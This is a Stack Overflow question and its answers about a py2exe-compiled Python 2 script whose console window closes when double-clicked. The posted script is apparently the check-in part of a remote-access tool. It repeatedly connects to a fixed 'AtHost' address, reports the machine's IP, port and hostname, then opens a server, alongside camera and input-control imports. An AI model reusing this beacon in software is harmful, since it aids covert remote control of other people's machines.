# Python time.sleep closes terminal

Tags: python, compilation, executable, py2exe

I used this setup.py script:

```
from distutils.core import setup
import py2exe

setup(console=['tcphost.py'])
to compile a code that imports this:

import os
import pygame.camera
import numpy as np
import time
import cv2
import socket
import autopy
import glob

def TCPclient ():
CreatePath()
ViHost = str(socket.gethostbyname(socket.gethostname()))
ViPort = 6869
AtHost = "192.168.56.1"
AtPort = ViPort

AtSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

TryCon = True
while TryCon == True:
    try:
        print "Trying to connect..."
        AtSock.connect((AtHost, AtPort))
        TryCon = False
    except:
        print "Could not connect"
        TryCon = True
        time.sleep(30)
print ("Connected.")
AtSock.send("<||.IP..||>" + ViHost)
time.sleep(1)
AtSock.send("<||.PRT.||>" + str(ViPort))
time.sleep(1)
AtSock.send("<||.NAM.||>" + str(socket.gethostname()))
time.sleep(1)
AtSock.send("<||.EXT.||>")
time.sleep(1)
AtSock.close()
print ("Messages sent and socket closed.")
TCPserver (ViHost, ViPort)

if __name__ == "__main__":
    TCPclient()
```

(can´t post all of the code because it's to big for stack overflow)

And it compiles fine however when i try to run the executable a terminal window pops up prints

```
Trying to connect...
Could not connect
```

(as it should)but then closes realy fast however if i try to run it **from** the terminal it works fine.
Why and how can i make it stay opend?

**EDIT**

Just to make it clear if i double click the executable a window pops up and closes.
If i run the exe from the comand line everything is fine.

Comment: Can you reproduce this with a smaller, self-contained example that you can post the entirety of? What happens if you have a script that just does `time.sleep()` without all the extra networking stuff? That will help you isolate the problem.

Comment: When you say "closes realy however", do you mean "closes really quickly. However..."?

Comment: What operating system version and Python version is this on? What compiler (e.g. Visual Studio) version are you using?

Answer (score 1, accepted):

`time.sleep` is not what causing the script to stop.

Windows command is doing what it's supposed to do, it runs the script then when everything is executed it closes on its own.

A common way to stop this from happening is to include `input()` at the end of your script:

**Python 2.7**

```
raw_input("Press Enter to exit")
```

or **Python 3.4**

```
input("Press Enter to exit")
```

Comment: Not realy since while the connection fails the program should wait and try to connect again.

Comment: It can't be from `time.sleep()` the problem lies elsewhere. After it prints `Could not Connect` is there a wait time? Also is there a wait time between `Trying to connect...` and `Could not Connect`?

Comment: The correct way to prevent a script from closing automatically is to add the `-i` parameter when running it. It'll exit to the interactive interpreter.

Comment: That's a pretty strong statement that it "can't" be from `time.sleep`, especially since that seems to be the location where the program is stopping. Can you suggest a more specific way to find out where the problem is? OP says the rest of the lines of the program aren't running, so it seems likely a simple `input()` at the end wouldn't run either.

Comment: @Navith: The case where it's erroring for OP is when the `py2exe`-compiled program is run by double-clicking it. Is there a mechanism to provide the `-i` parameter in this scenario?

Comment: @AndrewJanke at what point would `time.sleep()` cause an interruption in the program besides due to compilation which he is not having. That's why in my comment I'm trying to find out the sequence of his messages to see if `time.sleep()` command is being executed properly.

Answer (score 0):

I may be wrong on the try:-except: syntax/execution but I think that the first time you try to connect you set TryCon to False and therefore you never enter the while loop again.

```
while TryCon == True:
    try:
        print "Trying to connect..."
        AtSock.connect((AtHost, AtPort))
        TryCon = False                   # I think this might be your problem
    except:
        print "Could not connect"
        TryCon = True
        time.sleep(30)
```

Comment: You are not understanding the script is fine if i run from the therminal but just double clicking the executable makes the window disapear

Answer (score 0):

Is it possible that you need to include a Microsoft Visual C Runtime DLL for the `py2exe`-compiled version to work? The py2exe tutorial says this is required.

http://www.py2exe.org/index.cgi/Tutorial#Step5

The Python `time.sleep` function makes a system call or standard library call to the OS's `sleep` function. Perhaps this is one of the functions that is supplied by the C Runtime redistributable.

That could explain why `time.sleep` works when you run it in the normal Python interpreter from the command prompt, but fails when run in the bundled .exe program. The behavior you're seeing seems consistent with the `time.sleep` call failing: that could raise an exception or other error, which your script is not handling, and cause termination of the program, which would close the console window.

Try wrapping your entire program in a `try`/`except` block so you can catch additional errors, display them, and do that `input()` trick to hold the console window open. You may also need to indent the lines of your function definition to get it to be recognized as a function body instead of top-level script statements.

Also try running your bundled .exe from the command line, instead of double-clicking it. Depending on how it is compiled, that could cause output to go to your existing console window, which would stay open after the program terminated, so you could see any error messages. You may also be able to use the Windows `start` command to get the same effect.